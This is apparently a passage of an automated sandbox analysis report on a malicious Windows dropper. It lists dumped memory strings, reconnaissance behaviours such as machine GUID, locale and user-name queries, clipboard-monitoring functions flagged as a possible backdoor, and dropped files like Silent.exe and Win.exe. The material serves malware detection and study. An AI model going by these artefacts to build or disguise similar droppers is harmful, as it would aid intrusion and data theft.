Source: setup.exe, 00000006.00000001.14306303332.000000000049F000.00000002.sdmp, installer.exe, 0000000B.00000000.14321313278.000000000049F000.00000002.sdmp, systemSpawn.exe, 0000000F.00000000.14333161648.000000000049F000.00000002.sdmp, systemSpawn.exe.6.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSi

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\ProgramData\Win.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_1_000000013FE8D360
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FEA2610 cpuid 5_1_000000013FEA2610
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\ProgramData\Win.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\ProgramData\Win.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\run.bat VolumeInformationJump to behavior
Source: C:\ProgramData\Win.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\ProgramData\Win.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\Silent.exe VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE78E60 GetSystemTime,SystemTimeToFileTime,5_1_000000013FE78E60
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00444930 GetComputerNameW,GetUserNameW,6_2_00444930
Contains functionality to query windows versionShow sources
Source: C:\ProgramData\Win.exeCode function: 5_1_000000013FE7B9A8 GetVersionExW,5_1_000000013FE7B9A8
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
OS version to string mapping found (often used in BOTs)Show sources
Source: setup.exeBinary or memory string: WIN_XP
Source: setup.exeBinary or memory string: WIN_VISTA
Source: setup.exeBinary or memory string: WIN_7
Source: setup.exeBinary or memory string: WIN_8
Source: systemSpawn.exe.6.drBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.24.01\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003WIN_2000%04hXcomspecGetCursorInfo0x%Ix*pPIntStrPtrShortCharInt64DoubleAStrWStrgdi32comctl32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity. The program is now unstable and will exit.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescCaseLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapiH
Source: setup.exeBinary or memory string: WIN_8.1

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00415370 Shell_NotifyIconW,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,6_2_00415370
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\setup.exeCode function: 6_2_00415C00 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,6_2_00415C00

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 638829 Sample: iaejSdZgD3 Startdate: 17/08/2018 Architecture: WINDOWS Score: 100 83 Antivirus detection for dropped file 2->83 85 Antivirus detection for submitted file 2->85 87 Multi AV Scanner detection for submitted file 2->87 89 6 other signatures 2->89 10 iaejSdZgD3.exe 4 2->10         started        12 Silent.exe 4 2->12         started        16 LaunchServ.exe 2->16         started        18 4 other processes 2->18 process3 file4 20 cmd.exe 10->20         started        55 C:\ProgramData\qswGutmnEr\Silent.exe, PE32 12->55 dropped 103